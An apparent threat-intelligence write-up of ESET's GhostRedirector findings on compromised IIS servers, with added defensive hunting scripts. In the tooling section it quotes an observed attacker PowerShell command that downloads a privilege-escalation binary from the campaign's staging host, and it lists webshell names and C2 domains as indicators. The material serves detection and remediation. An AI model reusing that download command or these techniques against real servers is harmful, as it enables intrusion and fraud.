ESET researchers have unmasked a compact yet highly effective campaign, dubbed GhostRedirector, that has compromised at least 65 Internet-facing Windows servers worldwide. The operation, active since at least August 2024 and observed in ESET telemetry between December 2024 and April 2025, combines a custom passive C++ backdoor with a malicious native IIS module to deliver long-term persistence and server-side SEO fraud as a service. The findings, published on WeLiveSecurity, reveal an attacker arsenal that includes never-before-documented malware, publicly available privilege escalation exploits, and a multi-layered persistence model designed to evade detection while monetizing the reputation of legitimate websites.

The campaign's two centerpiece components are Rungan, a passive backdoor that can execute arbitrary commands and create local users, and Gamshen, a malicious IIS module that selectively alters HTTP responses only when the request comes from search engine crawlers like Googlebot. By injecting backlinks or redirecting crawlers to attacker-chosen gambling sites, GhostRedirector effectively turns compromised servers into unwitting participants in a black-hat SEO operation. The victim profile is geographically concentrated in Brazil, Thailand, and Vietnam, with additional incidents in Peru, the United States, and a handful of other nations. Affected organizations span education, healthcare, retail, transportation, technology, and insurance—indicating opportunistic targeting of exposed IIS stacks rather than a single vertical.

Rungan: The Passive C++ Backdoor

Rungan is a native C/C++ implant observed deployed as miniscreen.dll under C:\ProgramData\Microsoft\DRM\log. It uses AES (CBC mode) to decrypt embedded strings and configuration, reusing an implementation likely borrowed from the public AvoidRandomKill repository. The backdoor registers one or more HTTP listeners through the Windows HTTP Server API (http.sys), which routes requests by registered URL prefix to whichever process registered them. That lets Rungan share port 80 with IIS without passing through the web server: requests for its URL are delivered to Rungan's own process rather than to w3wp.exe. The default listening URL is http://+:80/v1.0/8888/sys.html, and additional URLs can be specified in a configuration file located at C:\Windows\Microsoft.NET\Framework64\v2.0.50727\1033\vbskui.dll. Rungan parses incoming HTTP requests that match hardcoded parameters and executes backdoor commands. Notable capabilities include creating local user accounts, executing arbitrary commands, and dynamically adding new listening URLs to its configuration.

Because Rungan waits passively for properly formed HTTP requests rather than beaconing out, it reduces its network detection surface. Its ability to create privileged local accounts and execute arbitrary commands makes it a versatile tool for re-establishing footholds, installing additional malware, or acting as an operational remote-control channel even after other artifacts are removed. Defenders must look beyond standard IIS file audits, as Rungan operates independently of the web server's own process space by abusing the HTTP Server API. Hunting for anomalous HTTP registrations or unexpected listeners is essential.
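Because Rungan registers its URL with http.sys rather than with IIS, the registration is visible in the HTTP service state but not in any IIS configuration. The following script, an added example that is not ESET's tooling or code from the report, parses the text of `netsh http show servicestate view=requestq verbose=yes` and flags registered URLs that match no known-good pattern. The SAMPLE block is constructed to approximate that command's output: the Rungan URL is the default named above, while the queue names, group IDs and PIDs are illustrative. The KNOWN_GOOD list assumes a plain IIS host (site bindings on 80/443 plus WinRM) and must be extended per server.

```python
"""Hunt for http.sys URL registrations that do not belong to IIS or other
known Windows components, the artifact a passive HTTP Server API listener
such as Rungan leaves behind.

Added example, not ESET's tooling. Feed it the text of
    netsh http show servicestate view=requestq verbose=yes
captured on each suspect host. SAMPLE is constructed to approximate that
output: the Rungan URL is the one named in the report; the queue names,
IDs and PIDs are illustrative.
"""
import re

SAMPLE = """\
Snapshot of HTTP service state (Request Queue View):
-----------------------------------------------------

Request queue name: Request queue is unnamed.
    Version: 2.0
    State: Active
    Number of active processes attached: 1
    Process IDs:
        4812
    URL groups:
    URL group ID: FE00000040000001
        State: Active
        Request queue name: Request queue is unnamed.
        Number of registered URLs: 1
        Registered URLs:
            HTTP://+:80/V1.0/8888/SYS.HTML

Request queue name: DefaultAppPool
    Version: 2.0
    State: Active
    Number of active processes attached: 1
    Process IDs:
        2160
    URL groups:
    URL group ID: FE00000040000002
        State: Active
        Request queue name: DefaultAppPool
        Number of registered URLs: 2
        Registered URLs:
            HTTP://*:80:/
            HTTPS://*:443:/
"""

# Registrations expected on a plain IIS host: site bindings on 80/443 and
# WinRM. Extend per host (other site ports, Exchange, SQL Reporting, ...).
KNOWN_GOOD = [
    re.compile(r"^HTTPS?://(\*|\+|[\d.]+):(80|443):/$", re.I),
    re.compile(r"^HTTP://\+:(5985|47001)/WSMAN/$", re.I),
]

def parse_servicestate(text):
    """Return one dict per request queue: {"queue", "pids", "urls"}."""
    queues, current, mode = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        # an unindented "Request queue name:" starts a new queue section
        if raw.startswith("Request queue name:"):
            current = {"queue": line.split(":", 1)[1].strip(), "pids": [], "urls": []}
            queues.append(current)
            mode = None
        elif current is None:
            continue
        elif line == "Process IDs:":
            mode = "pids"
        elif line == "Registered URLs:":
            mode = "urls"
        elif mode == "pids" and line.isdigit():
            current["pids"].append(int(line))
        elif mode == "urls" and re.match(r"^https?://", line, re.I):
            current["urls"].append(line)
        else:
            mode = None          # any other line ends the list being consumed
    return queues

def suspicious_registrations(queues):
    """Registrations matching no KNOWN_GOOD pattern, with the owning PIDs so
    the process can be identified (tasklist /FI "PID eq <pid>")."""
    hits = []
    for q in queues:
        for url in q["urls"]:
            if not any(p.match(url) for p in KNOWN_GOOD):
                hits.append({"queue": q["queue"], "pids": q["pids"], "url": url})
    return hits

if __name__ == "__main__":
    for h in suspicious_registrations(parse_servicestate(SAMPLE)):
        print(f"SUSPECT {h['url']}  queue={h['queue']!r} pids={h['pids']}")
```

A hit on an unnamed queue owned by a process that is neither w3wp.exe nor a service host is the pattern to chase: resolve the PID, check the image path and signer, and capture the process before terminating it, since the listener may be the only on-disk trace of the implant's configuration.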

Gamshen: The Crawler-Aware IIS Module for SEO Fraud

Gamshen is implemented as a native C/C++ IIS module DLL that hooks into key IIS event handlers: OnBeginRequest, OnPreExecuteRequestHandler, OnPostExecuteRequestHandler, and OnSendResponse. Its primary goal is to intercept and modify responses destined for search engine crawlers while leaving regular user traffic untouched. The activation flow is meticulous:

  • It checks whether the User-Agent contains Googlebot or the Referer includes google.com.
  • It ignores POST requests and static resources (images, CSS, JavaScript) to avoid breaking normal site behavior.
  • It matches the request URL against a set of regex patterns that include keywords such as android, plays, articles_, details, iosapp, topnews, and joga.

When all conditions are met, Gamshen queries its command-and-control server—hosted on domains like brproxy.868id[.]com and gobr.868id[.]com—for a base64-encoded payload. If the C2 responds with data, Gamshen decodes and injects it into the HTTP response sent to the crawler. If the C2 returns a 404 or is unavailable, the module redirects the crawler to a fallback C2 endpoint. This behavior effectively transforms the compromised site into a doorway or link farm that boosts search engine rankings for the attacker's clients. Forensic evidence, including images recovered via VirusTotal pivoting, indicates the beneficiaries are Portuguese-language gambling sites.

The stealth of Gamshen lies in its in-process execution within w3wp.exe and its dynamic payload delivery. Traditional site audits, file integrity checks, and casual user reports are unlikely to detect the fraud. The module does not leave persistent artifacts in site content directories, and the malicious responses are ephemeral. This technique mirrors earlier IIS-based SEO fraud families like IISerpent (documented by ESET in 2021) and the DragonRank campaign reported by Cisco Talos in 2024. The convergence suggests a cottage industry of SEO manipulation services that leverage compromised IIS infrastructure.
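Since Gamshen's output never reaches a normal visitor, the practical check is a differential one: request the same URL as a browser and as Googlebot and diff what comes back. The script below is an added example, not ESET's or the article's code. `fetch_http` performs a single real request with the standard library without following redirects; `compare_crawler_view` takes the fetcher as a parameter so the logic can be exercised offline against `cloaked_site_fake`, a constructed stand-in for a compromised host that injects backlinks only for a Googlebot User-Agent. The hostnames and the injected link are constructed, and the User-Agent strings are illustrative.

```python
"""Differential request check for crawler-only cloaking of the kind the
Gamshen module performs. Added example, not ESET's or the article's code.

fetch_http() performs a single real request with the standard library and
does not follow redirects. The comparison logic takes the fetcher as a
parameter so it can be exercised offline against cloaked_site_fake(), a
constructed stand-in for a compromised host.
"""
import http.client
import re
from urllib.parse import urlparse

# Gamshen keys on a User-Agent containing "Googlebot" or a google.com Referer.
CRAWLER_UA = "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
BROWSER_UA = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/120.0 Safari/537.36"
HREF_RE = re.compile(r"""<a\s[^>]*href\s*=\s*["']([^"']+)["']""", re.I)

def fetch_http(url, user_agent, referer=None, timeout=10):
    """GET url once; return (status, Location header or None, body text)."""
    p = urlparse(url)
    conn_cls = http.client.HTTPSConnection if p.scheme == "https" else http.client.HTTPConnection
    conn = conn_cls(p.hostname, p.port, timeout=timeout)
    headers = {"User-Agent": user_agent}
    if referer:
        headers["Referer"] = referer
    path = (p.path or "/") + ("?" + p.query if p.query else "")
    conn.request("GET", path, headers=headers)
    resp = conn.getresponse()
    body = resp.read().decode("utf-8", errors="replace")
    conn.close()
    return resp.status, resp.getheader("Location"), body

def external_link_hosts(body, own_host):
    """Hosts of absolute <a href> targets that point away from own_host."""
    hosts = set()
    for href in HREF_RE.findall(body):
        h = urlparse(href).hostname
        if h and h.lower() != own_host.lower():
            hosts.add(h.lower())
    return hosts

def compare_crawler_view(url, fetch=fetch_http):
    """Fetch url as a browser and as Googlebot (with a google.com Referer) and
    report a crawler-only redirect or crawler-only external backlinks."""
    own_host = urlparse(url).hostname
    b_status, _, b_body = fetch(url, BROWSER_UA)
    c_status, c_loc, c_body = fetch(url, CRAWLER_UA, referer="https://www.google.com/")
    crawler_only_hosts = external_link_hosts(c_body, own_host) - external_link_hosts(b_body, own_host)
    crawler_only_redirect = (300 <= c_status < 400) and not (300 <= b_status < 400)
    return {
        "browser_status": b_status,
        "crawler_status": c_status,
        "crawler_redirect_to": c_loc if crawler_only_redirect else None,
        "crawler_only_link_hosts": sorted(crawler_only_hosts),
        "suspicious": crawler_only_redirect or bool(crawler_only_hosts),
    }

def cloaked_site_fake(url, user_agent, referer=None, timeout=10):
    """Constructed stand-in for a compromised site: the page is normal for a
    browser, but a Googlebot request gets a block of injected backlinks."""
    page = '<html><body><a href="/about">About</a><p>Welcome</p>'
    if "Googlebot" in user_agent:
        page += '<div><a href="http://injected-backlink.invalid/page">x</a></div>'
    return 200, None, page + "</body></html>"

if __name__ == "__main__":
    # Offline demonstration; pass the default fetch_http for a real host and
    # pick URLs that match the keyword patterns Gamshen activates on.
    print(compare_crawler_view("http://victim.invalid/articles_1", fetch=cloaked_site_fake))
```

Two details matter when running this against a real host: test URLs whose paths match the activation keywords (articles_, details, topnews and the rest), because a static resource or a non-matching path will look clean, and run the check from a trusted address outside the datacenter, since the module's decision may also depend on where the request appears to originate.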

Privilege Escalation: The “Potatoes” and Fallback Accounts

GhostRedirector routinely uses publicly known local privilege escalation exploits from the Potato family—specifically EfsPotato and BadPotato variants—to escalate to SYSTEM and create persistent administrative accounts. These exploits abuse token impersonation semantics (SeImpersonate / SeAssignPrimaryToken) and COM/DCOM server behavior to obtain elevated tokens. Obfuscated .NET binaries (often protected with .NET Reactor) are deployed to either create new local administrator accounts or hijack existing ones via RID-hijacking techniques. ESET recovered usernames such as MysqlServiceEx, MysqlServiceEx2, and Admin, along with password artifacts like the string “huang” (Chinese for yellow).

A reusable .NET library called Comdai (distributed as Common.Global.DLL) underpins many of these privilege escalation tools. Comdai centralizes user creation, HTTP helper routines, named-pipe communication, and service manipulation. One named pipe, salamander_pipe, can receive parameters to create an administrator user on demand. The library also hardcodes a C2 domain https://www.cs01[.]shop for potential outbound communication. The shared PDB path pattern—featuring a distinctive x5 substring—links Comdai with Rungan, Gamshen, and the privilege escalation tools, indicating a unified development environment.

Once attackers gain SYSTEM privileges, they can register native IIS modules, install services, modify ServiceDLL registry values, and create rogue accounts, exactly the vectors observed in this campaign. The fallback accounts ensure persistent access even if the primary implants are discovered and removed.

Tooling and Infrastructure: Reuse and Operational Patterns

GhostRedirector’s tooling exhibits deliberate reuse and careful operational design:

  • A common staging server, 868id[.]com (with subdomains like xzs.868id[.]com and xz.868id[.]com), hosted downloads for all components, including the privilege escalation binaries, Rungan, Gamshen, and even the legitimate GoToHTTP remote administration tool.
  • Valid code-signing certificates (TrustAsia RSA Code Signing CA G3, issued to Shenzhen Diyuan Technology Co., Ltd.) were used to sign several payloads, potentially to evade endpoint defenses.
  • The Zunput tool (SitePut.exe) automatically enumerates IIS websites, drops webshells (ASP, PHP, JavaScript) into directories containing dynamic content, and logs site details to log.txt. The webshell names are chosen randomly from a predefined list and include extensions like .cer, .pjp, .asp, and .aspx.
  • Chinese language strings, the signing certificate’s origin, and password artifacts contribute to ESET’s medium-confidence attribution to a China-aligned threat actor. However, the researchers explicitly frame this as a probabilistic assessment.

Initial access is believed to occur through SQL injection vulnerabilities, with attackers then using PowerShell or CertUtil to download tools from the staging server. Commands observed executing include:

cmd.exe /d /s /c " powershell curl https://xzs.868id[.]com/EfsNetAutoUser_br.exe -OutFile C:\ProgramData\EfsNetAutoUser_br.exe"

and similar calls for EfsPotato_sign.exe, link.exe, and the Gamshen DLLs.

Victimology and Operational Intent

ESET’s telemetry between December 2024 and April 2025, combined with an internet-wide scan in June 2025, identified at least 65 compromised IIS hosts. The true number is likely higher. Victims are concentrated in Latin America and Southeast Asia: Brazil, Peru, Thailand, Vietnam, with U.S.-based servers often leased to companies in those regions. Affected sectors are diverse, underscoring the opportunistic nature of the campaign. The primary motive appears to be monetization through SEO fraud—specifically, boosting gambling sites—rather than data theft or espionage. This aligns with the broader industry trend of SEO-as-a-service criminal enterprises.

Detection and Hunting: Prioritized Signals

Defenders must adopt a multi-layered hunting approach, as the threat blends in-process modules, passive backdoors, and legacy privilege escalation techniques:

  • IIS module registry anomalies: Use appcmd list modules or IIS Manager to audit native module registrations. Check applicationHost.config for unexpected DLL paths, especially under %SystemRoot%\System32\inetsrv or ProgramData. Look for DLLs with names like ManagedEngine64_v2.dll or ManagedEngine32_v2.dll.
  • Crawler-specific response differences: Reproduce requests using Googlebot and regular browser User-Agent strings from trusted IPs. Compare responses. Sudden appearance of injected backlink lists or redirects only for crawler agents is a strong indicator.
  • Sysmon/EDR telemetry: Monitor for named pipe creation (salamander_pipe), CreateProcessAsUser/CreateProcessWithToken usage, and unusual token impersonation events—hallmarks of Potato-style escalation.
  • Known artifacts: Search for files named miniscreen.dll, ManagedEngine64_v2.dll, SitePut.exe, EfsNetAutoUser.exe, DotNet4.5.exe, and link.exe. Check scheduled tasks, ServiceDLL values, and local user accounts for recently created admin users.
  • Network indicators: Monitor outbound HTTP/HTTPS from w3wp.exe to brproxy.868id[.]com, gobr.868id[.]com, xzs.868id[.]com, xz.868id[.]com, q.822th[.]com, and www.cs01[.]shop. Block these domains proactively.
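The Sysmon/EDR and rogue-account signals above, together with the account creation and salamander_pipe behaviour described in the privilege escalation section, can be checked against exported event logs. The script below is an added example, not ESET's tooling: it parses per-event XML of the shape produced by `wevtutil qe ... /f:xml` (Security events 4720 and 4732, Sysmon events 17 and 18) and flags local user creation, additions to Administrators, and the Comdai named pipe. SAMPLE_EVENTS is constructed: the user and pipe names are those the report recovered, while the timestamps, host name, SID and image path are illustrative, and the `_ev` helper only exists to build that sample.

```python
"""Hunt Windows Security and Sysmon events for the account-creation and
named-pipe activity the Potato-style escalation chain and the Comdai
library produce. Added example, not ESET's tooling.

Input is per-event XML as exported by, for example,
    wevtutil qe Security /q:"*[System[(EventID=4720 or EventID=4732)]]" /f:xml
and the Sysmon Operational channel. SAMPLE_EVENTS is constructed: the user
and pipe names come from the report; times, host, SID and image path are
illustrative.
"""
import xml.etree.ElementTree as ET

NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}
SEC, SYSMON = "Microsoft-Windows-Security-Auditing", "Microsoft-Windows-Sysmon"
KNOWN_USERS = {"mysqlserviceex", "mysqlserviceex2", "admin"}   # named in the report
KNOWN_PIPES = {"\\salamander_pipe"}                              # Comdai pipe

def _ev(provider, event_id, time, data, host="WEB01"):
    """Build one event XML string (constructed test data, wevtutil-shaped)."""
    body = "".join(f'<Data Name="{k}">{v}</Data>' for k, v in data.items())
    return (f'<Event xmlns="{NS["e"]}"><System><Provider Name="{provider}"/>'
            f'<EventID>{event_id}</EventID><TimeCreated SystemTime="{time}"/>'
            f'<Computer>{host}</Computer></System><EventData>{body}</EventData></Event>')

SAMPLE_EVENTS = [
    _ev(SEC, 4624, "2025-01-15T03:10:01Z", {"TargetUserName": "alice", "LogonType": "3"}),
    _ev(SYSMON, 17, "2025-01-15T03:12:40Z", {"PipeName": "\\salamander_pipe",
                                             "Image": "C:\\ProgramData\\EfsNetAutoUser_br.exe"}),
    _ev(SEC, 4720, "2025-01-15T03:12:44Z", {"TargetUserName": "MysqlServiceEx",
                                            "SubjectUserName": "WEB01$"}),
    _ev(SEC, 4732, "2025-01-15T03:12:45Z", {"TargetUserName": "Administrators",
                                            "MemberSid": "S-1-5-21-1-2-3-1105"}),
    _ev(SEC, 4720, "2025-01-20T09:00:00Z", {"TargetUserName": "svc_backup",
                                            "SubjectUserName": "jsmith"}),
]

def parse_event(xml_text):
    """Flatten one event into provider, id, time, host and its EventData map."""
    root = ET.fromstring(xml_text)
    system = root.find("e:System", NS)
    return {
        "provider": system.find("e:Provider", NS).get("Name"),
        "id": int(system.find("e:EventID", NS).text),
        "time": system.find("e:TimeCreated", NS).get("SystemTime"),
        "host": system.find("e:Computer", NS).text,
        "data": {d.get("Name"): (d.text or "") for d in root.findall("e:EventData/e:Data", NS)},
    }

def hunt(xml_events):
    """Return findings (severity, rule, detail, time, host) sorted by time."""
    findings = []
    for ev in map(parse_event, xml_events):
        d, f = ev["data"], None
        if ev["provider"] == SEC and ev["id"] == 4720:
            name = d.get("TargetUserName", "")
            f = ("high" if name.lower() in KNOWN_USERS else "review",
                 "local user created", f"{name} (by {d.get('SubjectUserName', '?')})")
        elif ev["provider"] == SEC and ev["id"] == 4732 \
                and d.get("TargetUserName", "").lower() == "administrators":
            f = ("high", "member added to Administrators", d.get("MemberSid", "?"))
        elif ev["provider"] == SYSMON and ev["id"] in (17, 18) \
                and d.get("PipeName", "").lower() in KNOWN_PIPES:
            f = ("high", "Comdai named pipe", f"{d['PipeName']} by {d.get('Image', '?')}")
        if f:
            findings.append({"severity": f[0], "rule": f[1], "detail": f[2],
                             "time": ev["time"], "host": ev["host"]})
    return sorted(findings, key=lambda x: x["time"])

if __name__ == "__main__":
    for f in hunt(SAMPLE_EVENTS):
        print(f"[{f['severity']:6}] {f['time']} {f['host']} {f['rule']}: {f['detail']}")
```

Every 4720 on a web server deserves a look, not only the names ESET recovered: an account created with the machine account as the subject, seconds before a 4732 into Administrators, is the shape a Potato-escalated tool leaves regardless of what it names the user. Sysmon only emits events 17 and 18 when its configuration includes a PipeEvent rule, so confirm that before treating an empty result as clean.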

Containment and Remediation Playbook

  1. Isolate and preserve: Immediately disconnect suspected hosts from the network but keep them powered on. Capture memory dumps of w3wp.exe and a forensic image of the system drive before rebooting.
  2. Collect artifacts: Secure applicationHost.config, the IIS module list, scheduled tasks, ServiceDLL registry values, local user lists, event logs, and Sysmon data.
  3. Remove unauthorized IIS modules: Unregister and delete unknown native modules. Do not assume removal equals full recovery—check for fallback accounts and alternate implants.
  4. Purge rogue accounts: Disable or delete suspicious local administrator accounts. Rotate all credentials, revoke certificates, and reset secrets exposed on the compromised system.
  5. Hunt and remove webshells: Scan web directories for files with suspicious names and extensions (.cer, .pjp, .asp, .aspx). Commonly dropped names include C1.php, Cmd.aspx, Error.aspx, K32.asxp, K64.aspx, and LandGrey.asp.
  6. Rebuild: Given the layered persistence, a full rebuild is often safer than incremental cleaning. Rebuild from known-good media and restore data only after thorough analysis.
  7. Harden defenses: Patch all web applications, implement a web application firewall (WAF) tuned to block SQL injection, restrict IIS native module registration to highly privileged accounts, and enforce multi-factor authentication with just-in-time access for administrative roles.
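Steps 2 and 3 of the playbook, and the first hunting item above, come down to reading applicationHost.config for native module registrations that do not belong. The following script is an added example, not ESET's tooling: given a copy of the file collected from the host, it lists every entry under globalModules, records whether each is enabled in a modules section, and flags images outside the IIS and .NET system directories or names that mimic the built-in managed-engine modules. SAMPLE_CONFIG is constructed: the two clean entries are standard IIS modules, and the third reuses the ManagedEngine64_v2.dll name from the report at an illustrative ProgramData path. The expansion of %windir% to C:\Windows is an assumption; adjust TRUSTED_DIRS for legitimate third-party modules installed elsewhere.

```python
"""Offline audit of an IIS applicationHost.config for native module
registrations that look out of place. Added example, not ESET's tooling.

Point it at a copy of %windir%\\System32\\inetsrv\\config\\applicationHost.config
collected from the host (cross-check with `appcmd list modules`). SAMPLE_CONFIG
is constructed: two standard IIS entries plus one that reuses the
ManagedEngine64_v2.dll name from the report at an illustrative path.
"""
import re
import xml.etree.ElementTree as ET

SAMPLE_CONFIG = r"""<configuration>
  <system.webServer>
    <globalModules>
      <add name="UriCacheModule" image="%windir%\System32\inetsrv\cachuri.dll" />
      <add name="ManagedEngine64" image="%windir%\Microsoft.NET\Framework64\v4.0.30319\webengine4.dll"
           preCondition="integratedMode,runtimeVersionv4.0,bitness64" />
      <add name="ManagedEngine64_v2" image="C:\ProgramData\ManagedEngine64_v2.dll" />
    </globalModules>
  </system.webServer>
  <location path="" overrideMode="Allow">
    <system.webServer>
      <modules>
        <add name="UriCacheModule" lockItem="true" />
        <add name="ManagedEngine64" lockItem="true" />
        <add name="ManagedEngine64_v2" />
      </modules>
    </system.webServer>
  </location>
</configuration>
"""

# Where genuine IIS native modules live (assumes the system drive is C:).
TRUSTED_DIRS = (r"c:\windows\system32\inetsrv", r"c:\windows\microsoft.net")
# Built-in managed-engine module names; anything that merely starts with one
# of these (e.g. ManagedEngine64_v2) is a look-alike.
GENUINE_ENGINE_NAMES = {"ManagedEngine", "ManagedEngine64",
                        "ManagedEngineV4.0_32bit", "ManagedEngineV4.0_64bit"}

def expand_windir(image):
    """Expand %windir%/%SystemRoot% (assumed C:\\Windows) and lower-case the path."""
    return re.sub(r"%(windir|systemroot)%", lambda m: r"c:\windows", image, flags=re.I).lower()

def audit_modules(xml_text):
    """One record per globalModules entry: name, image, enabled flag, reasons."""
    root = ET.fromstring(xml_text)
    enabled = {a.get("name") for m in root.iter("modules") for a in m.findall("add")}
    findings = []
    for gm in root.iter("globalModules"):
        for add in gm.findall("add"):
            name, image = add.get("name", ""), add.get("image", "")
            path = expand_windir(image)
            reasons = []
            if not any(path.startswith(d + "\\") for d in TRUSTED_DIRS):
                reasons.append("image outside the IIS/.NET system directories")
            if name not in GENUINE_ENGINE_NAMES and \
                    any(name.lower().startswith(g.lower()) for g in GENUINE_ENGINE_NAMES):
                reasons.append("name mimics a built-in managed-engine module")
            findings.append({"name": name, "image": image,
                             "enabled": name in enabled, "reasons": reasons})
    return findings

def suspicious_modules(xml_text):
    """Only the entries that triggered at least one reason."""
    return [f for f in audit_modules(xml_text) if f["reasons"]]

if __name__ == "__main__":
    for f in suspicious_modules(SAMPLE_CONFIG):
        state = "enabled" if f["enabled"] else "registered only"
        print(f"{f['name']} ({state}) {f['image']}: {'; '.join(f['reasons'])}")
```

Treat the output as a worklist rather than a verdict: hash and check the signature of every flagged image, and compare the full module list against a known-good server of the same build, since a module dropped into inetsrv with an unremarkable name passes the path check and is caught only by that comparison.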

Strategic Risks and Business Impact

The GhostRedirector campaign poses several strategic risks beyond the immediate technical compromise:

  • Search engine penalties: Participating—even unwillingly—in cloaking schemes can lead to de-indexing or ranking demotion by Google. Recovery from such penalties is expensive and organic traffic loss can linger for months.
  • Reputational damage: Customers and partners may lose trust if a company’s website is found to be serving malicious or deceptive content to crawlers.
  • Operational resilience: The attacker’s multi-pronged persistence model means incomplete remediation often results in re-infection. Organizations may face repeated clean-up cycles, driving up incident response costs.
  • Regulatory exposure: If compromised servers process regulated data (healthcare, education, insurance), the incident may trigger breach notification obligations under GDPR, HIPAA, or similar frameworks.

Conclusion

GhostRedirector represents a sophisticated evolution in server-side SEO fraud, combining a stealthy, passive backdoor with a crawler-aware IIS module that abuses the trust of legitimate websites. The campaign's reliance on public privilege escalation exploits and its multi-component persistence make it a resilient threat. For Windows and IIS administrators, the takeaways are clear: internet-facing servers must be instrumented for behavioral detection beyond file signatures, and security teams should actively hunt for the specific indicators outlined by ESET. Given the active exploitation pattern and the likely commercial motive behind the operation, similar campaigns will continue to surface. Defenders must treat any sign of native IIS module tampering or anomalous crawler responses as a high-priority incident.